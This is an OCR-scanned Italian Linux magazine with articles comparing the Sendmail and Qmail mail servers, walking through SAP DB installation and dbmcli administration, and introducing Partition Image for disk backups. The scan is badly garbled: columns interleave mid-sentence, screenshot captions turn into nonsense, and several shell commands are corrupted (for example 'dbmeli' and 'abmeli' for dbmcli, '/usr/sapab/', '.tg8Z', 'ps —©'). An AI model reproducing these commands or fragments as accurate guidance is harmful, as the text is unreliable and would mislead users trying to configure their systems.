Debian .debs) and redistribute qmail for free. You can get the “big picture" ofhow qmailis organized. You should read Life vath amal 


There is a discussion list and an announcements list for qmail users, maintained by Dan Bernstein using qmail, of course. There's also an archive. You can searchit. 
It's also archived at eGroups and at SecurePoint There is also an FAQ, providing answers to frequentiy-asked questions. Dave Sil runs a moderated list which 
excerpts the best of the amail mailing list. 


Figura I 


Homepage non ufficiale di Qmail://qmail.imd.it/top.html. 


(Simple Mail Transfer tutorial, FAO, esempi e nel migliore dei modi. Se la 
Protocol). | relativi siti uffi- manuali per destreggiarsi sua completezza è un van- 
ciali sono: 


www.sendmail.org e 
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taggio, di certo i suoi files di 
configurazione mostrano 
l'altra faccia della medaglia. 
Basti pensare che più dell’ 
80% delle opzioni disponibi- 
li non vengono mai usati 
dalla maggior parte dei 
sysadm. ll meccanismo di 
generazione del file di confi- 
gurazione (sendmail.cf), 
ovvero il processore di 
macro m4, rende la fase di 
settaggio certamente più 
agevole, anche se si rischia 
di perdersi in tutte le possi- 
bili alternative che vengono 
offerte. 

La grande diffusione di tale 
software, poi, ha portato gli 
hackers a concentrare su di 
esso la maggior parte dei 
loro attacchi, proprio perché 
sicuri di trovarlo nella stra- 
gande maggioranza dei ser- 
ver pubblici. Inoltre il basso 
livello di sicurezza che offre 
la configurazione base stan- 
dard apre le porte ai più 
disparati tipi di attacchi. Il 


www.qmail. org. 
Naturalmente ambedue i 
pacchetti sono Open Source 
e quindi liberamente scari- 
cabili da Internet e utilizza- 
bili senza particolari vincoli. 
Come già detto, il fatto che 


EG) SENDMAILe 


Sendmail sia il più “vec- lamenti Nene 

chio” MTA che usa il proto- iscrive rtor i ltizicrlinanagic deren 

collo SMTP ne fa lo stan- 

dard, e quindi troviamo tale ssi Pi mei AWG Largest Esa Bain fr Lima gn FA 
pacchetto in tutte le mag- MSGsI dica Eioab eg ove ei Pea en Rino 
giori distribuzioni Linux. Fra 

gli indubbi vantaggi del N Foattas Prondo Added Secuit and Conto lEmai Polis 
Sendmail citiamo il fatto 

che si tratta di un software Mann ole Bean (ne Recita ca Viel Pica 


certamente maturo ed affi- 
dabile. La sua enorme diffu- RAMVAN Fe RASGNSE 207i ComplSiiGAe Horiore ziat DINA 
sione poi garantisce il repe- inizi 
rimento di tutta la docu- 
mentazione possibile su 
ogni aspetto di configura- 
zione ed installazione. Sono Figura 2 


disponibili on-line molti Homepage di Sendmail. 
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Qmail invece è molto meno 
complesso, ma non per 
questo meno funzionale. 
Inoltre il codice sorgente 
viene distribuito anche con 
una serie di 

add-on che mancano nel 
Sendmail. Non mancano 
comunque le funzionalità 
per abilitare il masquera- 
ding degli utenti e degli 
host, i virtual domain, etc... 
Inoltre, dal punto di vista 
della sicurezza, il Qmail è 
molto meno vulnerabile agli 
attacchi. Le patch di sicurez- 
za che vengono consigliate 
sono molto meno numero- 
se di quelle per il Sendmail, 
e poi c'è in premio la 
somma di $ 1000 per chi 
riesce a forzare un sistema 
attraverso il servizio offerto 
da Qmail. Una pecca del 
QOmail è comunque la man- 
canza di una documentazio- 
ne puntuale, specialmente 
in fase di installazione. 


sendma:l?M 


+ News Flash 


© Sendmail 8 12.1 is available; it fixes a potential local security problem for several operating systems. 


Proprio questo processo è 
composto da una serie di 
step manuali, che invece 
nell’installazione del 
Sendmail sono 
automatizzati. 

C'è bisogno di un certa 
dimistichezza con 
l'amministrazione del 
sistema per poter portare a 
termine tale installazione. 
Un'altra differenza 
fondamentale che viene 
fuori nel confronto è che il 
Qmail non prevede dei filtri 
anti SPAM, cosa che invece 
è prevista nel Sendmail. In 
effetti, mentre nel Sendmail 
viene fatto il controllo se 
esiste veramente il dominio 
di posta del mittente, e nel 
caso contrario rifiuta il 
messaggio, il Omail accetta 
comunque la richiesta di 
consegna della e-mail, e 
genera poi un bounce 
interno con un messaggio 
d'errore. Tale problema può 


ìn tius site you wall find the following mnformanon 


o Sendmail 8 11.6 is available; it fixes a security problem with command line processing. 

© Sendmail 8 11.0 is available; it includes support for STARTTLS and SMTP AUTH encryption 

o An important security announcement has been released regarding a Linux kemel bug in versions up to 2.2.15. 

o Sendmail, Inc. is offering Sendmail Multi Switch (based on 8.11) for commercial networked routing, Sendmail Advanced Message Server for hosting 
and Sendmail Mobile Message Server for Web/Wireless access. 


» Current Release 


o Release Notes for the current version. 
o Known Bugs - not always up to date. 
o PGP Keys - Keys used to sign sendmail distributions and security announcements. 
© Try a mirror of fp. sendmail org or access via http://www sendmail org/ftp! ifyou encounter problems accessing the FTP server 


» Primary resources for learning about sendmail ... 


Please read the FAO, as well as Co: 


a_l'amnilan Crndenzil 


Figura 3 


Homepage di Sendmail.org. 
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and Co 


comunque essere risolto 
documentandosi a dovere 
su alcune mailing-list. 


Supporto, 


assistenza e . 
aggiornamenti 


Il Sendmail offre, 
attraverso il sito 
www.sendmail. com, un 
servizio di assistenza 
tecnica a pagamento. 
Inoltre la versione 
commerciale include tutta 
una serie di tool di 
configurazione e di 
manuali non presenti nella 
versione free. C'è 
comunque da dire che la 
maggior parte dei 
potenziali problemi sono 
trattati nelle numerose 
mailing-list esistenti. Il 
Qmail invece non ha molta 
documentazione a corredo. 


‘atton pages, before asking questions of the sendmail maintainers. 
o Frequently Asked Questions - also posted to comp.mail sendmail and news. answers. 


Fra le società che offrono 
consulenza e assistenza su 
tale software spicca la 
inter7.com. Tale compagnia 
distribuisce, inoltre, tutta 
una serie di add-on 
freeware per completare la 
gestione WEB BASED dei 
servizi di posta. 

Un aspetto da non 
sottovalutare è di sicuro 
quello degli aggiornamenti. 
Infatti, per i problemi legati 
alla sicurezza o alle 
prestazioni, esce quasi ogni 
mese una nuova release di 
Sendmail. Ciò obbliga gli 
amministratori di rete più 
esigenti e precisi ad 
effettuare l'aggiornamento, 
per evitare brutte sorprese. 
Sono invece anni che il 
Qmail è fermo alla 

versione 1.03, questo da 
solo potrebbe essere un 
motivo fondamentale per 
sceglierlo come applicativo 
sul proprio server. 


Prestazioni 


Di certo queste due 
alternative sono entrambe 
validissime e offrono 
prestazioni di tutto rispetto. 
Ci sono però alcune 
considerazioni tecniche da 
fare per scegliere l'uno o 
l'altro software. La prima è 
certamente quella legata al 
tipo di collegamento con 
cui il nostro server mail è 
collegato alla rete. 

Più nel dettaglio abbiamo 
che, se il collegamento è 
abbastanza veloce, allora 
conviene utilizzare il Omail 
che è più snello, anche se 
consuma più banda. 

Se invece il nostro 
collegamento ad internet è 
di tipo dial-up, o comun- 
que non è molto prestante, 
la nostra scelta dovrebbe 


7} Inter? è Bringing You Advanced Internet Technologies * QMAIL - Mic 


osolì Internet Explorer di 


Having problems with Qmail? 
Need professional support? 
“Thinking of building a large clustered e-mail system? 


Inter7's expent team of software profes 
Support for Omail In our opinion (and o 
bestchoice for e-mail servers Itis fr 

excellent secunty and a large group of 


mail is a perfect start for small to medium 


maintaining efficient growth to 
volume, load balanced, cluster 


Figura 4 


for high & 


envronments 


Hai problemi con Qmail? Prova a dare uno sguardo su //interz.com/qmail. 


ricadere sul Sendmail. 


Ma perché 
questo! 


Immaginiamo di dover 
spedire un messaggio 
molto grande ad una 
mailing list che contiene 
numerosi iscritti. Tali 
iscritti, inoltre, spesso 
appartengono allo stesso 
dominio di posta. 

Cosa succede? 

Sendmail si collega una 
sola volta con il server 
destinatario e gli invia una 
sola copia del messaggio 
che viene poi duplicato sul 
server per tutti gli utenti. 
Omail, invece, si collega 
tante volte quanti sono gli 
utenti che dovranno 
ricevere tale messaggio, e 


ad ognuno in parallelo ne 
manda una copia. 

Da qui è semplice dedurre 
la diversa richiesta di 
ampiezza di banda. La 
velocità del Omail risiede 
nel fatto che i messaggi 
sul server vengono 
conservati con una 
struttura organizzata a 
directory, e non in un 
unico file monolitico per 
ogni utente. Questa scelta 
fa risparmiare molti cicli di 
CPU e accesso al disco 
nella fase di lettura dei 
messaggi. 


Conclusioni 


Come anticipato all’inizio 
dell'articolo non può 
esistere un vincitore fra 
questi due software, ma 
certamente si può 


scegliere quello che in un 
particolare contesto si 
comporta meglio. 

Quello che comunque ci 


deve fare riflettere è se 
veramente abbiamo 
bisogno di tutta la potenza 
del Sendmail. Per portare a 
termine l'installazione e la 
totale configurazione di 
Omail sono necessarie 
poco più di due ore, 
mentre per la stessa 
operazione eseguita con il 
rivale più blasonato, 
spesso non bastano due 
giorni. La sicurezza è un 
altro fattore da non 
sottovalutare, e noi di 
certo non abbiamo 
tralasciato di evidenziare le 
doti di affidabilità del 
Omail. Ogni sfida che si 
rispetti ha però un 
vincitore! 


Che dire allora? 


Se non esiste un vincitore 
dichiarato, dovremo per 
forza rifarci all'episodio del 
gigante Golia che è stato 
sconfitto sul suo campo di 
battaglia proprio dal più 
piccolo Davide. 

Carlo Stumpo 


pren (Jed 0,98,7). E noacsi sendnail.cf (Te 


Figura 4 
L'edit del file sendmail.cf. 
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SAP DB: 


I database open source di SAP 


SAP DB è un database relazionale basato sul linguaggio SQL, con elevate prestazioni ed alta 
scalabilità, che può essere utilizzato sia per le piccole applicazioni che in una grande azienda. 
SAP DB aggiunge alle soluzioni tecnologiche dei database relazionali, l'orientazione agli 
oggetti e il supporto per la gestione di dati non strutturati. È indipendente dalla piattaforma e 
consente agli utenti di utilizzarlo in un ampio insieme di progetti. Supporta standard aperti 
come SQL, JDBC e ODBC. È accessibile da programmi di script come Perl e Python, ma anche 
da web utilizzando pagine Html o Xml. 


utto questo è 
senz'altro un otti- 
mo punto di par- 
tenza per un 
RDBMS (Relational Data 
Base Management 
System) ma la caratteristi- 
ca più importante è quella 
annunicata il 5 ottobre 
2000 al Linux World: SAP 
DB sarà un prodotto Open 
Source che verrà distribui- 
to con licenza GNU GPL 
(General Public License) 
per il kernel del database e 
licenza GNU LGPL (Lesser 
General Public License) per 
i client e le interfacce di 
programmazione. Senza 
dubbio si tratta di una scel- 


ta coraggiosa! Comunque, 
nonostante il mercato dei 
database sia ancora domi- 
nato da aziende come 
Oracle, IBM e MicroSofît, i 
database Open Source 
stanno conquistando sem- 
pre maggiori consensi tra 
gli addetti ai lavori ed 
hanno lanciato la sfida ai 
grossi nomi. Le aziende 
attente al bilancio hanno 
da tempo cominciato ad 
utilizzare al posto dei 


costosi sistemi tradizionali, 


soluzioni alternative altret- 
tanto valide come 
PostgreSOL, MySQL e 
Interbase. La decisione di 
“regalare” SAP DB ha 


creato un po' di agitazione 
in chi pensava di aver già 
conquistato una fetta del 
mercato, soprattutto dopo 
aver visto all'opera il pro- 
dotto sui diversi sistemi 
operativi per cui è disponi- 
bile: Linux, Solaris, HP-UX, 
Tru64, AIX e Windows 
NT/2000. 


Installazione 


Attualmente sul sito uffi- 
ciale http://\www.sapdb.org 
risulta disponibile la ver- 
sione 7.3.0 (build 15) del 
database in formato rpm o 
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tgz (per i più esigenti sono 
disponibili anche i sorgen- 
til). 

Prima di procedere con 
l'installazione è necessario 
verificare il possesso dei 
requisiti minimi, ovvero: 
glibc versione 2.1 o supe- 
riore, libpthread versione 
0.8 o superiore, 128 MB di 
RAM e almeno 100 MB di 
spazio libero sul disco più 
quello necessario per i 
database. Per l'installazio- 
ne vera e propria, invece, 
procedete come segue. Ef- 
fettuate il login come uten- 
te root e copiate il package 


Powered by 


SAP DB 


Figura i 


path> (/usr/sapdb/indep_ 
data), <group name> (sap- 
db) e <owner name> (sap- 
db). Durante la creazione 
dell'utente sapdb vi verrà 
anche chiesto di specifica- 
re una password che sarà 
utile in seguito. Per confer- 
mare le scelte effettuate, 
premete y ed attendete la 
fine della copia dei file su 
disco. 

Terminata questa prima 
fase vi verranno poste altre 
domande, relative a 
<dependent path> (/usr/ 
sapdb/depend) e di nuovo 
<group name> (sapdb) e 


Il logo da inserire sul sito web per idicare che utilizza SAP DB. 


tgz scaricato in una cartella 
a vostro piacimento, per 
esempio /tmp. 

Con il comando 


# tar —xpvzf /tmp/ 
sapdb-server-linux-3gbit- 
i386-7_3_0_15.tg8Z 


estraete i quattro file con- 
tenuti nel package. 
Eseguite il programma di 
installazione digitando: 


# /tmp/SDBINST 


Vi verranno fatte alcune 
domande a cui sarà suffi- 
ciente rispondere confer- 
mando le scelte proposte, 
premendo semplicemente 
il tasto INVIO. Confermate 
quindi le scelte relative a 
<indipendent program 
path> (/usr/sapdb/indep_ 
prog), <indipendent data 
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<owner name> (sapdb). 
Sempre con il tasto y con- 
fermate per terminare l'in- 
stallazione. 

A questo punto è neces- 
sario eseguire a mano 
alcune operazioni addizio- 
nali: 


° # more /etc/services | 
grep sql[6,30] (per 
verificare che i servizi 
sqgl6 e sql30 sulle porte 
7210/tcp e 7200/tcp siano 
stati aggiunti al file 
/etc/services); 


# more /etc/group | 
grep sapdb (per 
verificare che sia stato 
aggiunto il gruppo 
sapdb); 


# more /etc/passwd | 
grep sapdb (per 
verificare che sia stato 


aggiunto l'utente sapdb); 


* # export PATH= 
$PATH: /usr/sapdb/ 
indep_prog/bin (questa 
modifica andrebbe 
inserita negli script di 
login per essere sempre 
disponibile). 


Qualora alcune di queste 
impostazioni non fossero 
state aggiunte corretta- 
mente sarà indispensabile 
intervenire manualmente 
per sistemare la situazione. 


Creazione e test 
del database di 
esempio 


In qualche caso, nel pro- 
cesso di installazione, è 
stata riscontrata la manca- 
ta copia degli script di 
creazione del database di 
esempio contenuti nella 
cartella /usr/sapdb/depend/ 
misc. 

Copiateli nella cartella /ho- 
me/sapdb ed effettuate il 
login come utente sapdb 
(la password è quella che 
avete specificato nel pro- 
cesso di installazione). A 
questo punto eseguendo 
lo script 


$ ./create_demo_db.sh 


verrà creato un database di 
nome TST che sarà subito 
messo on-line, pronto per 
rispondere alle richieste 
dei client. Lo script si pre- 
occuperà anche di creare 
gli utenti necessari per la 
gestione del database e del 
server, tra cui: 


e utente DBM, password 


DBM: per le funzioni di 
backup, controllo e ge- 
stione del database; 


utente DBA, password 
DBA: per la configurazio- 
ne del server, la gestione 
delle tabelle di sistema e 
la definizione degli altri 
utenti; 


* utente TEST, password 
TEST: per le normali atti- 
vità dell'utente sul data- 
base; 


A questo punto non rima- 
ne che provare ad eseguire 
qualche operazione sul da- 
tabase e, con un po’ di pa- 
zienza, orientarsi tra le in- 
numerevoli funzionalità 
messe a disposizione. Pri- 
ma però assicuratevi che il 
processo vserver sia in 
esecuzione, altrimenti do- 
vrà essere fatto partire ma- 
nualmente (anche questo 
potrebbe essere inserito 
negli script di avvio insie- 
me alle operazioni di start 
dei database che si voglio- 
no attivare). Per verificare 
questa situazione potete 
eseguire il comando 


$ ps —© | grep vserver 


oppure, facendo finta di 
niente, potete semplice- 
mente rieseguire il proces- 
so con il comando 


$ /usr/sapab/indep_prog/ 
bin/x_server start 


Per evitare di dover speci- 
ficare ogni volta l'intero 
cammino dei file eseguibi- 
li, impostate la variabile 
PATH anche per l'utente 
sapdb, così come specifi- 
cato nel quarto punto 
elenco del paragrafo pre- 
cedente. 


Ora che tutto è pronto 
vediamo come effettuare 
qualche operazione tipica 
dell'amministratore sul 
database di esempio crea- 
to precedentemente. Esiste 
un file eseguibile, dbmcli, 
che svolge le funzioni di 
“database manager” e 
consente appunto queste 
operazioni. 

Per verificare in che stato 
si trova il database di 
esempio, la cui istanza si 
chiama TST, bisogna ese- 
guire il comando 


$ abmeli -d TST -u 
DBM,DBM db_state 


dove l'opzione —d server 
per specificare il nome del- 
l'istanza e l'opzione -u ser- 
ve per specificare utente e 
password. 

La riposta può essere 
WARM (il database è pron- 
to ad accettare connessio- 
ni), COLD (le richieste ver- 
ranno accettate solo dal- 
l'amministratore), OFFLINE 
(il database non è partito) 
oppure ERR (se qualcosa è 
andato storto). Per modifi- 
care lo stato è possibile 
eseguire uno dei seguenti 
comandi dall’ovvio signifi- 
cato: 


$ dbmeli -d TST -u 
DBM,DBM db_warm 


$ dbmeli -d TST -u 
DBM,DBM db_cold 


$ dbmeli -d TST -u 
DBM,DBM db_offline 


Per quanto riguarda il re- 
sto delle operazioni possia- 
mo grossolanamente divi- 
derle in operazioni di defi- 
nizione dei dati (DDL - Da- 
ta Definition Language) e 
di manipolazione dei dati 


(DML - Data Manipulation 
Language). Nel primo 
gruppo rientrano tutti i 
comandi per la realizzazio- 
ne della struttura fisica del 
database e quindi necessa- 
ri per la creazione di tabel- 
le, indici, viste, store pro- 
cedure, ecc... Nel secondo 
gruppo, invece, troviamo i 
comandi per l'inserimento 
dei dati, la modifica e la 
cancellazione degli stessi, 
oltre naturalmente alla 
possibilità di interrogare il 
database tramite query 
SOL. Per testare questi 
comandi, possiamo ese- 
guire dbmcli in modalità 
interattiva e specificare di 
volta in volta quello che 
interessa. Digitiamo allora 


$ dbmeli -d TST -u 
DBM,DBM 


Il prompt assumerà una 
forma diversa, ad indicare 
che ci troviamo nell'am- 
biente del database mana- 
ger da dove possiamo ese- 
guire tutti i comandi del 
DDL e del DML, come per 
esempio 


$ sql execute create table 
impiegati (nome 
CHARC(10), cognome 
CHAR(15)) 


per la creazione della ta- 
bella impiegati; 


$ sql execute insert into 
impiegati values (‘carlo’, 
‘vasselli’) 


$ sql execute insert into 
impiegati values (‘linux’, 


‘magazine’) 


per l'inserimento di due 
record nella stessa tabella; 


$ sql execute select * 


from impiegati 


per l'interrogazione della 
tabella. Infine, utilizziamo il 
comando release per usci- 
re dall'ambiente del data- 
base manager. 


Funzionalità 
aggiuntive 


SAP DB mette a disposizio- 
ne dell'utente alcuni pac- 
chetti aggiuntivi che pos- 
sono essere utilizzati per 
accrescere le funzionalità 
dell'RDBMS con lo scopo 
di facilitarne l'utilizzo. 
L'accesso ai dati può avve- 
nire utilizzando diverse 
interfacce di programma- 
zione: i driver ODBC sia 
per sistemi Win32 che per 
sistemi Linux, i driver 
JDBC 2.0, il linguaggio 
Perl, il linguaggio Python, 
il linguaggio di script PHP 
e addirittura un precompi- 
latore C/C++. Tutte queste 
interfacce sono liberamen- 
te scaricabili dal sito uffi- 
ciale (alcune sono state 
aggiunte al Cd-Rom allega- 
to alla rivista) e vengono 
distribuite con la licenza 
GNU LGPL. Personalmente 
ho sperimentato i driver 
ODBC da un client 
Windows e i driver JDBC 
da una macchina Linux 
senza incontrare particolari 
problemi. 
L'amministrazione dei 
database può avvenire 
anche da remoto, per 
esempio sfruttando la pro- 
pria intranet aziendale, 
installando il package Web 
Tools che utilizza il server 
web installato sulla mac- 
china (o quello messo a 
disposizione da SAP diret- 


tamente nel package) per 
la connessione verso il 
database. Il pacchetto è 
stato inserito nel Cd-Rom 
allegato. Per chi dovesse 
aver bisogno di aiuto, è 
disponibile la documenta- 
zione, che, anche se non 
eccezionale, risulta ben 
strutturata e può essere 
consultata direttamente 
on-line oppure installata 
sul proprio PC scaricando 
dal Cd-Rom in formato 
Html. È infine disponibile 
una mailing-list, consulta- 
bile anche da web all’indi- 
rizzo http://sapdb.icf.net/ 
cgi/talk-frame.htmi, che 
può essere utilizzata sia 
per ricevere le ultime infor- 
mazioni che per sottoporre 
la propria esperienza per- 
sonale direttamente agli 
sviluppatori di SAP DB. 


Conclusioni 


Se pensiamo che circa 
l'85% di applicazioni fun- 
zionanti nel mondo sono di 
tipo gestionale, è facile 
comprendere il motivo del 
crescente interesse verso 
RDBMS sempre più stabili 
e performanti. La gara tra i 
vari produttori di RDBMS 
Open Source è in atto da 
tempo, ma l'esito è ancora 
oggi assolutamente incer- 
to. L'unica cosa certa è 
però questa: se fino a poco 
tempo fa qualcuno misura- 
va le prestazioni delle mac- 
chine Linux in LAMP 
(Linux + Apache + MySQL 
+ Php), forse, tra qualche 
tempo potremmo azzarda- 
re un cambio dell'unità di 
misura introducendo il 
LASP (Linux + Apache + 
SapDB + Php). 

Carlo Vasselli 
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Partition 


Image 


Con Partition Image possiamo finalmente creare delle immagini del disco fisso da 
ripristinare in caso di perdita dei dati o malfunzionamenti generali. Esaminiamone 
il funzionamento per apprezzare al meglio le caratteristiche 
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hi utilizza Linux 
da qualche 
tempo avrà avuto 
modo di 
apprezzare le doti di 
flessibilità e stabilità di 
questo fantastico sistema 
operativo; stabilità e 
sicurezza che non vanno 
però confuse con 
inattaccabilità. Le due 
parole suddette vanno 
infatti interpretate in 
chiave statistica, avendo 
cioè cura di eseguire 
periodicamente backup di 
dati e sistema. 
Il mondo GNU-Linux 
inoltre, al pari di una 
grande fornace, produce 
ogni giorno grandi 
quantità di codice 
distribuito con licenza 
GPL. Lo stesso Linux è il 


sistema libero che 
ognuno può modificare a 
proprio gusto e 
piacimento. Se 
consideriamo poi che 
molti file di 
configurazione possono 
essere modificati 
semplicemente con un 
editor di testo e che il 
web pullula di software e 
distribuzioni sempre 
nuove, non facciamo 
fatica a capire come Linux 
sia il sistema operativo 
più amato dagli 
"smanettoni" di tutta la 
terra! 

Ma cosa succede quando 
la voglia di modificare 
supera di gittata le 
capacità e le conoscenze 
dell'hacker? Cosa succede 
quando l'audacia supera 


la capacità? 

Penso sia semplice: nel 
migliore dei casi, invece 
di notare un 
miglioramento in seguito 
alla modifica apportata 
osserveremo 10 
peggioramenti in 10 
campi diversi; nel 
peggiore, il sistema 
diventerà inutilizzabile. 
Può darsi voi non amiate 
identificarvi in tale 
categoria, ma sarete 
probabilmente incorsi 
nella strana, anzi 
stranissima situazione di 
chi possiede una 
periferica, un programma 
o quant'altro, che svolge 
senza infamia né lode le 
proprie funzioni, ma dal 
quale con accanimento si 
vuole "ottenere di più", 


Figura : 
Partimage al primo avvio 


attivando nuove funzioni, 
facendole funzionare 
meglio o solo più 
velocemente. 

Non so se qualche 
psicologo abbia già dato 
un nome a tale "malattia", 
io la definisco 
semplicemente: Sindrome 
dell'Hacker, ( la parola 
Hacker, ovviamente, va 
intesa nel senso originale 
del termine, cioè chi 
lavora per testare e 
migliorare qualcosa), e vi 
assicuro trattarsi di una 
"sindrome" che mentre in 
alcuni casi può dare 
grandi soddisfazioni, 
molto spesso risulta 
"pericolosa", ...soprattutto 
per i meno esperti! 

La perdita di dati o 
configurazioni funzionanti 
è il pericolo numero uno 
per chi abbia infatti voglia 
di fare hacking sulla 
propria macchina, 
vediamo insieme come 
evitarle. 


Accorgimenti 
di base 


Per evitare fastidiose 


«perdite di dati basterà 


infatti seguire pochi 
accorgimenti di base. 

In ambiente Unix la 
sicurezza è da sempre un 
argomento molto vasto e 
importante, tanto da 
renderne impossibile la 
trattazione in un singolo 
articolo. 

Riserviamo per esempio 
l'uso dell'utente root alle 
sole operazione il cui 
utilizzo si rende 
indispensabile quali 
l'amministrazione del 
sistema o l'istallazione 
nuovo software; 
eseguiamo 
periodicamente backup 
di sicurezza, e anche nel 
caso di uso "domestico" 
della nostra postazione 
Linux provvediamo a 
creare un'opportuna 
partizionatura del nostro 
disco fisso. 

A seconda dello spazio a 
nostra disposizione 
potremo creare, oltre 
alle fondamentali 
partizione di root (/) e di 
swaap, una partizione 
destinata a contenere i 
soli dati degli utenti 
(/home). 

Così facendo, in caso di 


completa reinstallazione 
del sistema operativo, 
ogni utente potrà 
mantenere non solo i 
propri dati ma anche le 
proprie impostazione! 
Analogamente a quanto 
sopra, una partizione per 
il Super User (/root) 
provvederà a mettere in 
salvo eventuali dati e 
configurazioni 
dell'utente root, mentre 
una partizione montata 
in /usr/local o /opt 
preserverà i software ivi 
contenuti, evitando così 
lunghe e noiose 
reinstallazioni. 

| dati contenuti nelle 
suddette partizioni non 
sono comunque 


CONSUMER 


Perchè 
Partlmage? 


Ma torniamo a noi! In 
cosa può essere utile 
Partimage? Partimage 
consente di creare una 
copia speculare, bit a bit, 
della partizione su un 
singolo file (detto file- 
immagine). Il file potrà 
successivamente essere 
compresso e archiviato 
per essere facilmente 
ripristinata in eventuali 
casi di bisogno. L'hard 
disk si ritroverà così nelle 
stesse identiche 
condizioni di quando è 
stata prelevata 
l'immagine, con quindi le 
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Figura 2 
Il sito internet del prodotto, (http://www.partimage.org) è 


veramente molto ben costruito. 


inattaccabili, e la "sana 
abitudine" del backup 
periodico rimane 
pertanto l'unico vero 
rimedio ad eventuali e 
spiacevoli perdite di dati. 
Le partizioni secondarie 
di cui sopra non hanno 
strutture particolari, e 
pertanto la creazione 
delle rispettive copie di 
sicurezza può essere 
effettuata anche 
utilizzando il comando 
tar unitamente ai 
comandi gzip o bzip. 


stesse configurazioni e 
impostazioni. Potremo 
quindi utilizzare 
Partimage per riprodurre 
specularmente il 
contenuto di un hard disk 
su altre macchine, (si 
pensi alle installazioni in 
serie su macchine aventi 
le medsime 
caratteristiche); il tutto in 
tempi estremamente 
brevi e soprattutto senza 
le lunghe configurazioni 
che tutte le installazioni 
per propria virtù 
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richiedono. | sistemi 
commerciali offrono, 
ovviamente a pagamento, 
varie soluzioni per il 
recupero delle 
configurazioni di sistema; 
fra questi, le ultime 


ufficiale di PartlImage 
all'indirizzo http:/www.par- 
timage.org). 

L'installazione è molto 
semplice. Basterà 
prelevare il pacchetto 
precompilato più consono 


D partimago -static-0.3.6-11335.deb (368 KB - for Debian) 


2OOT disk with kernel 2.4.7 (G6S) 


i=bootdisk-2.4.7-1 raw (954 KB) 


BOOT: partimage 
È BOOT disk with kernel 22.16 (386) partimage -0.3.5-bootdisk-1 raw (937 KB) 
IROOT: ROOT disk with fies (386) partimage 0.3.6 -r00tdisk-2 saw (1195 KB) 


BOOT: Sttorito enage to burn partimage -0.3.6-bootcd-3.img (2880 KB) 
ROOT: Etorito manual Help about this eltorito image: partimage —ettorito txt (2 KB) 


@ partimage -0.8.0-rc1.tar.bz2 (315 KB) [sources] 


@ partimage -static-0.6.0-rc1.tar.bz2 (500 KB) kient+server (326 binaries] 
& partimage -static-0.6.0-1t1-1-1h711285.rpm (638 KB) [sent+server 1695 
bmaries] 


& partimago -static-0,6.0-rc1-11388.deb (30 KB) [sienteserver 1635 binariea] 
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Nella pagina dei download è possibile scaricare immagini di 


floppy o cd autobootable. 


versioni dei pacchetti più 
famosi, (Ghost di Norton, 
Drive Image di Power 
Quest, ecc.), annoverano 
fra i tanti formati 
supportati anche le 
partizioni Linux di tipo ext2 
e ReiserFS. 


Uso di partimage 


Partition Image nasce dalla 
necessità della comunità 
Linux di disporre di un 
prodotto distribuito con 
licenza open source, libero 
e gratuito, che cloni, 
seguendo i canoni del 
mondo Unix, le migliori 
caratteristiche dei prodotti 
sopra citati. 

AI momento della stesura 
dell'articolo, Partition 
Image è giunto alla 
versione 0.36 per quanto 
riguarda la versione 
stabile, mentre la versione 
di sviluppo pare essere 
giunta alla release 0.70, 
(maggiori e più aggiornate 
informazioni sul sito 


alla nostra distribuzione e 
procedere secondo le 
usuali procedure, o in casi 
particolari procedere alla 
ricompilazione prelevando 
i sorgenti. 

Dalle pagine del sito 
notiamo che gli 
sviluppatori di PartlImage 
durante lo sviluppo hanno 
ritenuto di modificare il 
formato di registrazione 
del file immagine, tanto da 
rendere i formati della 
versione stabile e di 
sviluppo reciprocamente 
incompatibili. Il problema 
sarà sicuramente risolto 
quando il nuovo formato 
verrà definito stabile, ma al 
momento è bene ricordare 
la versione usata al 
momento dei backup. 


Fotografare l'HD 
in poche mosse 


Con PartlImage potremo 
creare le copie delle 
partizioni presenti sulla 


nostra macchina in pochi 
passi. 

L'unico veto imposto dal 
programma è relativo allo 
stato della partizione da 
fotografare che deve 
essere "smontata". 

Nel mondo Unix possiamo 
infatti accedere alle 
informazioni contenute 
fisicamente nei dispositivi 
sia accedendo ad essi 
direttamente, sia 
eseguendo una comune 
operazione di montaggio 
del device, utilizzando il 
comando mount. 

| due modi di lavorare 
sono pertanto totalmente 
differenti, e mentre i 


fase di istallazione alla 
configurazione delle 
posizioni di montaggio. 
Purtroppo come già detto 
PartlImage ha bisogno di 
accedere allo stato fisico 
del disco, byte per byte, e 
pertanto necessita di 
lavorare con partizioni 
NON montate. Nessun 
problema pertanto se la 
partizione da archiviare è 
diversa dalla partizione di 
root (/), come per 
esempio le partizioni 
contenenti le partizioni 
/home, /opt, ecc. o le 
partizioni contenenti altri 
sistemi operativi quali il 
disco c:l di Windows. 
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* Partition to save/restore 
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fat92 


Port: 13000 


Le ultime versioni di Partimage supportano la lingua italiana. 


dispositivi o device 
rappresentano infatti 
fisicamente la partizione su 
cui risiedono i dati 
(/dev/hda1,/dev/hda2, 
/dev/hda3, ... ), le posizioni 
di mount ( /mnt/disk1, 
/mnt/disk2, /mnt/disk3, ... ) 
sono semplicemente delle 
cartelle in cui il contenuto 
della partizione viene 
“esposto” utilizzando un 
approccio molto più vicino 
al “modo di pensare” 
tipico del cervello umano. 
Tutte le distribuzioni di 
rispetto provvedono in 


Basterà acquisire i privilegi 
di root, smontare la 
partizione e avviare 
PartlImage secondo quanto 
sotto: 


$su 

[inserire la password di root] 

#umount /posizione/della/ 
partizione 

#partimage 


Qualche problema sorge 
invece qualora l'immagine 
da creare sia appunto la 
root (/) di Linux. Il sistema 
operativo ha infatti 


save parlilion to image file 


»ione 
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La partizione /dev/hdal e' 


montatl 


Partition Image non 
pu lavorare su partizioni 


uccessfully: 


monLate. Smontarla prima, si 


pu fare con “"umount /c" 
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Bytes 


fono dell'operazione. Attendere preso... 


Per dare il via al backup dovremo assicurarci che la partizione 


in oggetto sia smontata. 


bisogno della partizione / 
sempre montata per 
lavorare correttamente, si 
pensi solo alla continua 
necessità di scrivere file 
temporanei, o alla 
necessità di leggere e 
rileggere codici o configu- 
razioni. Dovremo perciò 
cercare un modo per 
aggirare il problema. Se 
sulla nostra macchina 
sono installate due o più 
distribuzioni Linux, 
potremo semplicemente 
utilizzarne una per creare il 
backup dell'altra e 
viceversa. Se invece sulla 
nostra macchina lo spazio 
scarseggia ed è installata 
una sola distribuzione 
Linux, dovremo 
appoggiarci ad un altro 
sistema Linux tempora- 
neo! Un'ottima soluzione 
consiste nello scaricare le 
immagini dei dischetti o 
dei cdrom autobootable, 
(in pratica dei sistemi 
Linux in miniatura) e 
procedere alla creazione di 
tali supporti seguendo le 
